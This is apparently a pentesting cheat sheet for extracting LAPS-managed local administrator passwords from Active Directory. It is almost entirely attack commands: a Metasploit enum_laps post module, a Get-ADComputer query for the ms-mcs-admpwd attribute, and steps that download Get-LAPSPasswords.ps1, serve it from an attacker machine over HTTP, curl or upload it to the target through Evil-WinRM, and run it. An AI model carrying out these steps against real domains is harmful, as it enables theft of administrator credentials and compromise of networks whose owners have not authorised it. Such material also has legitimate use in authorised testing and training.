LAPS (Local Administrator Password Solution) Pentesting

LAPS provides management of local account passwords of domain joined computers. Passwords are stored in Active Directory.

Enumeration

msfconsole
use post/windows/gather/credentials/enum_laps
set session 2
exploit

Obtain Administrator's Password

First, check if you are in the LAPS_Readers group.

net user <current-username>
# Global Group memberships  *LAPS_Readers

Using Get-ADComputer

Get-ADComputer gets the information of the Active Directory computer.

Get-ADComputer -Identity '<active-directory-computer-name>' -property 'ms-mcs-admpwd'

Using Get-LAPSPasswords.ps1

1. Download the Payload in Local Machine

   If you are in LAPS_Readers, you can get the administrator's password using Get-LAPSPasswords.ps1{:target="_blank"}{:rel="noopener"}.

   wget https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-LAPSPasswords.ps1
   

2. Transfer the Payload to Target Machine

   • via PowerShell

     First off, open web server in local machine.

     python3 -m http.server 8000
     

     Then curl in target machine

     curl http://<local-ip>:8000/Get-LAPSPasswords.ps1 -o .\Get-LAPSPasswords.ps1
     

   • via Evil-WinRM

     If you connect the remote Windows machine with Evil-WinRM, you can use directly by adding -s flag when connecting.

     evil-winrm -i <target-ip> -u username -p password -s /path/to/current/directory
     

     Then just execute the payload in evil-winrm console.

     PS > upload .\Get-LAPSPasswords.ps1 c:\Users\<username>\Desktop\Get-LAPSPasswords.ps1
     

3. Execute the Payload in Target Machine

   .\Get-LAPSPasswords.ps1